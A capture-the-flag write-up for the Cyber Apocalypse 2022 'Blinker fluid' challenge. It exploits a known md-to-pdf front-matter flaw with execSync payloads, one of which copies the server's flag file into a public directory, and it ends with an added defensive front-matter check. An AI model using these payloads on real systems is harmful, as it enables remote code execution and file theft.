Cyber Apocalypse 2022

Blinker fluid

Solved By : Bobbysox, Legend, Starrylord, thewhiteh4t

In the Blinker fluid challenge, our markdown input gets converted into a PDF file that is available for download.

In the site source we checked the package.json file:

        {
                "name": "blinker-fluids",
                "version": "1.0.0",
                "description": "",
                "main": "index.js",
                "scripts": {
                        "start": "node index.js"
                },
                "keywords": [],
                "author": "rayhan0x01",
                "license": "ISC",
                "dependencies": {
                        "express": "^4.17.3",
                        "md-to-pdf": "^4.1.0",
                        "nunjucks": "3.2.3",
                        "sqlite-async": "1.1.3",
                        "uuid": "8.3.2"
                },
                "devDependencies": {
                        "nodemon": "^1.19.1"
                }
        }

The interesting things in this file are:

"md-to-pdf": "^4.1.0"
"nunjucks": "3.2.3"

We quickly found the following CVE for md-to-pdf:


Payload as shown in the link:

---js\n((require("child_process")).execSync("id > /tmp/RCE.txt"))\n---RCE

The payload did not work for us as is, so we looked for more info on it and found this:



Basically, nunjucks was having issues with the single-line payload, so we settled on the following:

((require("child_process")).execSync("cat ../flag.txt > static/invoices/rce.txt"))

Lines 1 and 3 needed to be exactly as above for it to work, and we redirected the flag to a file in the invoices directory…
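From the defender's side, the payloads above depend on the submitted markdown opening with a front-matter delimiter that names an engine (`---js`). The check below is an added example, not part of the original writeup or the challenge code; the function names, the allow-list policy and the sample inputs are assumptions, and it is meant to run on user input before it reaches the markdown-to-PDF converter.

```javascript
// Added example (not the challenge's code). Assumption: the converter treats a
// document that starts with "---<engine>" as front matter for that engine.
// Policy (assumption): untrusted input may only carry plain YAML front matter.
const ALLOWED_ENGINES = new Set(["", "yaml", "yml"]);

// Returns the engine named on the opening delimiter line, "" for a bare "---",
// or null when the document has no front-matter block at all.
function frontMatterEngine(markdown) {
  const text = String(markdown).replace(/^\uFEFF/, ""); // ignore a leading BOM
  if (!text.startsWith("---")) return null;
  if (text[3] === "-") return null; // "----" is a horizontal rule, not a delimiter
  const firstLine = text.slice(3).split(/\r?\n/, 1)[0];
  return firstLine.trim().toLowerCase();
}

// Decide whether the input may be handed to the converter.
function checkMarkdown(markdown) {
  const engine = frontMatterEngine(markdown);
  if (engine === null || ALLOWED_ENGINES.has(engine)) {
    return { ok: true, engine };
  }
  return { ok: false, engine, reason: `front-matter engine "${engine}" is not allowed` };
}

// Constructed sample inputs; the bodies are harmless placeholders.
const samples = [
  "# Invoice 42\n\nTwo litres of blinker fluid.",
  "---\ntitle: Invoice 42\n---\n# Invoice 42",
  "---js\n({ title: 'Invoice 42' })\n---\n# Invoice 42",
  "\uFEFF--- JavaScript \r\n({})\r\n---\r\nbody",
];

for (const s of samples) {
  const verdict = checkMarkdown(s);
  console.log(JSON.stringify(s.slice(0, 20)), "->", verdict.ok ? "accept" : verdict.reason);
}
```

Rejecting on the delimiter line keeps the decision independent of whatever follows it, so the multi-line form that got past nunjucks is refused at the same point as the single-line one.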

Published on : 21 May 2022